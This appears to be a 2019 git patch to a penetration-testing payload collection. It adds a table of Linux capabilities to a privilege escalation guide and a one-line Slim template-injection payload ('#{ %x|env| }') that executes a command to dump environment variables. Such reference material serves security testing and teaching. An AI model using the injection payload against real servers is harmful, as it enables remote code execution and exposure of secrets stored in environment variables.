From 6f4a28ef664c21350260600f2925b7f6f53c0a0f Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Thu, 5 Dec 2019 23:06:53 +0100
Subject: [PATCH] Slim RCE + CAP list

---
 .../Linux - Privilege Escalation.md            | 18 ++++++++++++++++++
 Server Side Template Injection/README.md       |  8 ++++++++
 2 files changed, 26 insertions(+)

diff --git a/Methodology and Resources/Linux - Privilege Escalation.md b/Methodology and Resources/Linux - Privilege Escalation.md
index df74db0..ace5ec4 100644
--- a/Methodology and Resources/Linux - Privilege Escalation.md	
+++ b/Methodology and Resources/Linux - Privilege Escalation.md	
@@ -309,6 +309,24 @@ sh-5.0# id
 uid=0(root) gid=1000(swissky)
 ```
 
+| Capabilities name  | Description |
+|---|---|
+| CAP_AUDIT_CONTROL  | Allow to enable/disable kernel auditing |
+| CAP_AUDIT_WRITE  | Helps to write records to kernel auditing log |
+| CAP_BLOCK_SUSPEND  | This feature can block system suspends   |
+| CAP_CHOWN  | Allow user to make arbitrary change to files UIDs and GIDs |
+| CAP_DAC_OVERRIDE  | This helps to bypass file read, write and execute permission checks |
+| CAP_DAC_READ_SEARCH  | This only bypass file and directory read/execute permission checks  |
+| CAP_FOWNER  | This enables to bypass permission checks on operations that normally require the filesystem UID of the process to match the UID of the file  |
+| CAP_KILL  | Allow the sending of signals to processes belonging to others  |
+| CAP_SETGID  | Allow changing of the GID  |
+| CAP_SETUID  | Allow changing of the UID  |
+| CAP_SETPCAP  | Helps to transferring and removal of current set to any PID |
+| CAP_IPC_LOCK  | This helps to lock memory  |
+| CAP_MAC_ADMIN  | Allow MAC configuration or state changes  |
+| CAP_NET_RAW  | Use RAW and PACKET sockets |
+| CAP_NET_BIND_SERVICE  | SERVICE Bind a socket to internet domain privileged ports  |
+
 ## SUDO
 Tool: [Sudo Exploitation](https://github.com/TH3xACE/SUDO_KILLER)
 
diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md
index a4f48e7..d8101f9 100644
--- a/Server Side Template Injection/README.md	
+++ b/Server Side Template Injection/README.md	
@@ -85,6 +85,14 @@ Slim:
 <%= Dir.entries('/') %>
 ```
 
+### Code execution
+
+Execute code using SSTI for Slim engine.
+
+```powershell
+#{ %x|env| }
+```
+
 ## Java
 
 ### Basic injection